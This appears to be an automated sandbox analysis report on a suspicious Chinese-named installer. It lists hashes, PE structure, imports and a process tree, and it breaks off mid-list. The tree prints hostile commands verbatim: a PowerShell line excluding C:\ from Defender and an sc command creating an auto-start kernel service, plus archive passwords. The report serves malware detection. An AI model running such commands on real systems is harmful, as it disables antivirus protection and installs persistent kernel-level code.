                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File size:7'495'744 bytes
                            MD5:3dd1a269e502f7284674c54819e9ad8e
                            SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
                            SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
                            SHA512:392d4b57eadc20d7118954c3c9e44e80803cd0df05b9beecdab7219ba8a1826e0427748dec12b07c4179c444f526941399b606b79209393a08c16c1439256e05
                            SSDEEP:196608:l9Z1v6nEaCmoy2/qQAflhtvgG+Kay7DS2KI:lonELvy2/qRlhSG+Kx7DS2L
                            TLSH:C2762223F2CBD03EE05A1B3715B2A61494FB6A616523AD5296FCB4ECCF310601E3E657
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:0c0c2d33ceec80aa

                            Static PE Info

                            General

                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F2B4CE977C5h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F2B4CF2914Bh
                            call 00007F2B4CF28C9Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F2B4CF23978h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F2B4CE91873h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F2B4CF24CA3h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F2B4CF291D3h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F2B4CF2FEBAh
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F2B4CF25598h
                            mov edx, dword ptr [004B4200h]

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x11000b2dcf14000a1dc7150e021c573503d26False0.1877154181985294data3.723301568529278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.2045454545454546
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.2769121813031161
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                            Imports

                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                            Exports

                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 24, 2024 05:03:04.641779900 CET1.1.1.1192.168.2.60x8f69No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Dec 24, 2024 05:03:04.641779900 CET1.1.1.1192.168.2.60x8f69No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:23:03:06
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x900000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:23:03:06
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
                            Imagebase:0x820000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:23:03:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff6e3d50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:23:03:07
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:23:03:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff717f30000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:7
                            Start time:23:03:15
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x900000
                            File size:7'495'744 bytes
                            MD5 hash:3DD1A269E502F7284674C54819E9AD8E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:8
                            Start time:23:03:15
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
                            Imagebase:0x370000
                            File size:3'366'912 bytes
                            MD5 hash:CC931C68EF6CB43932F2B21773072C73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:9
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x970000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:12
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:13
                            Start time:23:03:17
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:14
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x970000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:23:03:19
                            Start date:23/12/2024
